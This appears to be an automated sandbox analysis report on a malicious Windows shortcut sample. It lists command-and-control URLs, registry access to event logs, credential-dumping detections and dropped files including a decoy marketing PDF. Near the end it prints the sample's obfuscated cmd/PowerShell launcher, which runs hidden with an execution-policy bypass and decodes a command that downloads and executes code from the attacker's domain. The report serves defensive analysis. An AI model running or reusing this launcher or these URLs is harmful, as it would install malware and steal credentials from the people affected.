        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252CF73B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz-
        Source: powershell.exe, 0000000A.00000002.3709676539.000002AE5E675000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000011.00000002.4167022853.00007FF704CA1000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000011.00000002.4161635712.000001ABABA48000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000011.00000000.3301026162.00007FF704CA1000.00000002.00000001.01000000.00000009.sdmp, myRdpService.exe, 0000002A.00000000.3822806621.00007FF7C2EB8000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://github.com/dotnet/runtime
        Source: powershell.exe, 00000015.00000002.3339933418.000001BA00BAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.3342030863.00000252D0B90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000002.00000002.3137956303.0000013EEA037000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3001836184.0000028310078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3339933418.000001BA014F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3607142957.000001BA101BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.3607142957.000001BA10079000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4E956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4FD60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com
        Source: svczHost.exe, 00000011.00000002.4160642820.000001ABAB078000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/StaticFile/RdpService/64
        Source: svczHost.exe, 00000011.00000002.4160642820.000001ABAB078000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/StaticFile/RdpService/64h
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDB927000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d751
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDB927000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDA3B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180e76bad6
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDA3B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c321180ec5cd00
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDC508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118c066b7fc
        Source: powershell.exe, 0000000A.00000002.3321499337.000002AE4E993000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4FD60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/d75123253ee9915640e2d3f6e9e28a8b05de536145ec35997b85624670c32118d1df58f1
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDB927000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file
        Source: powershell.exe, 0000000A.00000002.3321499337.000002AE4E5D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.3321499337.000002AE4E7FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/0e2b542dde5230d991123cf170512b0225ae8c373d66c8038f016679055f4d5229
        Source: powershell.exe, 0000000A.00000002.3321499337.000002AE4E993000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/30bb492ec87899a2b4a8fa5c9eeec46908bbc655365f1557b986a778660e2192b4
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDA3B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/71d9165f3c9a29b4f9fd666440a5628d7bdaea493d607cf1c194857c9e9509ea85
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDB927000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c863024
        Source: powershell.exe, 00000006.00000002.2992412595.0000028300269000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/bf3e3406944bdd6271588a2c863024f40dd9933ab9ffdddddfc3c4688b888a33b5
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDA3B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/c57c20654b4343be4907fbac7f1262d6a79cc73fd2886dcfe5fc8312754be0cde2
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDB927000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3084642389.0000013EDA6A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file2/d236daeb5918e564f4863398b715f01869e225c4b1e47494e277f9475d91f1c561
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDA3B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/file3/4a96c3f7097c69e170f8b4a479e7540e1d95f8254179e0d696fd65d88733fb6e3c
        Source: powershell.exe, 00000002.00000002.3084642389.0000013EDA1EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uyt1n8ded9fb380.com/sybpc
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49760 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49768 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49770 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.137.62:443 -> 192.168.11.30:49786 version: TLS 1.2

        Spam, unwanted Advertisements and Ransom Demands

        barindex
        Reads the Security eventlog
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\myRdpService
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\myRdpService
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
        Reads the System eventlog
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\RdpService
        Source: C:\Windows\Temp\myRdpService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: cOOhDuNWt7.lnk, type: SAMPLEMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
        Source: amsi64_8236.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: 42.2.myRdpService.exe.7ff7c27f0000.0.unpack, type: UNPACKEDPEMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
        Source: 0000002A.00000002.4163193855.00007FF7C2CF6000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
        Source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 8236, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: svczHost.exe PID: 9772, type: MEMORYSTRMatched rule: creddump is a python tool to extract credentials and secrets from Windows registry hives. Author: @mimeframe
        Powershell drops PE file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\fileJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC4ACEF1C62_2_00007FFC4ACEF1C6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC4ACEFF722_2_00007FFC4ACEFF72
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC4ACF0C2A2_2_00007FFC4ACF0C2A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFC4ADB32CD2_2_00007FFC4ADB32CD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFC4AD0855221_2_00007FFC4AD08552
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFC4AD077A621_2_00007FFC4AD077A6
        Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\myRdpService.exe 5B570471125EA0A0E5E693AB8493381A59E08C909472B461A9B1FF007CD1BB12
        Source: svczHost.exe.10.drStatic PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3691
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3644
        Source: C:\Windows\Temp\svczHost.exeProcess created: Commandline size = 2904
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 3691Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3644Jump to behavior
        Source: C:\Windows\Temp\svczHost.exeProcess created: Commandline size = 2904
        Source: cOOhDuNWt7.lnk, type: SAMPLEMatched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
        Source: amsi64_8236.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 42.2.myRdpService.exe.7ff7c27f0000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
        Source: 0000002A.00000002.4163193855.00007FF7C2CF6000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
        Source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 8236, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: svczHost.exe PID: 9772, type: MEMORYSTRMatched rule: hacktool_windows_moyix_creddump author = @mimeframe, description = creddump is a python tool to extract credentials and secrets from Windows registry hives., reference = https://github.com/moyix/creddump
        Source: powershell.exe, 00000019.00000002.3332542132.00000252CE998000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBP+
        Source: classification engineClassification label: mal100.troj.expl.evad.winLNK@77/132@2/5
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/publication/350074388_media_buying_for_digital_marketing?enrichid=rgreq-45e8a82d93c7bee0fc128ff405fad003-xxx&enrichsource=y292zxjqywdlozm1mda3ndm4odtbuzoxmdaxnjcznjcznjg3mdqxqde2mtu4mjkwmji3otg%3d&el=1_x_3&_esc=publicationcoverpdf
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/keren-obara?enrichid=rgreq-45e8a82d93c7bee0fc128ff405fad003-xxx&enrichsource=y292zxjqywdlozm1mda3ndm4odtbuzoxmdaxnjcznjcznjg3mdqxqde2mtu4mjkwmji3otg%3d&el=1_x_5&_esc=publicationcoverpdf
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.thebalancesmb.com/purpose-and-elements-of-a-situational-analysis-2295754
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://mediatool.com/2018/04/18/a-beginner-s-guide-to-media-planning-buying
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/keren-obara?enrichid=rgreq-45e8a82d93c7bee0fc128ff405fad003-xxx&enrichsource=y292zxjqywdlozm1mda3ndm4odtbuzoxmdaxnjcznjcznjg3mdqxqde2mtu4mjkwmji3otg%3d&el=1_x_4&_esc=publicationcoverpdf
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.wearemarketing.com/blog/a-step-by-step-guide-to-structuring-a-digital-marketing-plan.html
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/Keren-Obara?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_4&_esc=publicationCoverPdf
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/publication/350074388_MEDIA_BUYING_FOR_DIGITAL_MARKETING?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_2&_esc=publicationCoverPdf
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.obicreative.com/media-buying-and-planning/
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/Keren-Obara?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_5&_esc=publicationCoverPdf
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/Keren-Obara?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_7&_esc=publicationCoverPdf
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/publication/350074388_MEDIA_BUYING_FOR_DIGITAL_MARKETING?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_3&_esc=publicationCoverPdf
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/keren-obara?enrichid=rgreq-45e8a82d93c7bee0fc128ff405fad003-xxx&enrichsource=y292zxjqywdlozm1mda3ndm4odtbuzoxmdaxnjcznjcznjg3mdqxqde2mtu4mjkwmji3otg%3d&el=1_x_10&_esc=publicationcoverpdf
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/keren-obara?enrichid=rgreq-45e8a82d93c7bee0fc128ff405fad003-xxx&enrichsource=y292zxjqywdlozm1mda3ndm4odtbuzoxmdaxnjcznjcznjg3mdqxqde2mtu4mjkwmji3otg%3d&el=1_x_7&_esc=publicationcoverpdf
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/profile/Keren-Obara?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_10&_esc=publicationCoverPdf
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/publication/350074388_media_buying_for_digital_marketing?enrichid=rgreq-45e8a82d93c7bee0fc128ff405fad003-xxx&enrichsource=y292zxjqywdlozm1mda3ndm4odtbuzoxmdaxnjcznjcznjg3mdqxqde2mtu4mjkwmji3otg%3d&el=1_x_2&_esc=publicationcoverpdf
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/?enrichid=rgreq-45e8a82d93c7bee0fc128ff405fad003-xxx&enrichsource=y292zxjqywdlozm1mda3ndm4odtbuzoxmdaxnjcznjcznjg3mdqxqde2mtu4mjkwmji3otg%3d&el=1_x_1&_esc=publicationcoverpdf
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/?enrichId=rgreq-45e8a82d93c7bee0fc128ff405fad003-XXX&enrichSource=Y292ZXJQYWdlOzM1MDA3NDM4ODtBUzoxMDAxNjczNjczNjg3MDQxQDE2MTU4MjkwMjI3OTg%3D&el=1_x_1&_esc=publicationCoverPdf
        Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf.6.drInitial sample: https://www.researchgate.net/publication/350074388
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9780:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1796:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9932:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1072:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1796:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5436:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9924:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7588:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:10096:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9924:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6008:120:WilError_03
        Source: C:\Windows\Temp\myRdpService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1072:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6008:304:WilStaging_02
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:10096:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3952:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3952:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5436:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:304:WilStaging_02
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\STARTUAC
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8244:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9932:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9780:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8244:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7588:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwpxlmfh.3hw.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
        Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /v /k "St^ar^t /M^In "" P^ow^eRSh^eLL -W h^id^d^E^N -NoLO^go -NO^p -Ep by^P^aS^S -eN^C^O^dEDc^o^M^mA^N^d "SQBFAFgAIAAoAFsAVABFAFgAdAAuAEUAbgBjAE8ARABJAG4ARwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwBUAFIASQBuAGcAKAAoAGkAdwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAzAE4ANQBZAG4AQgBqACIAKQApACkAKQAuAEMATwBuAFQARQBOAHQAKQApAA=="" && exit
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
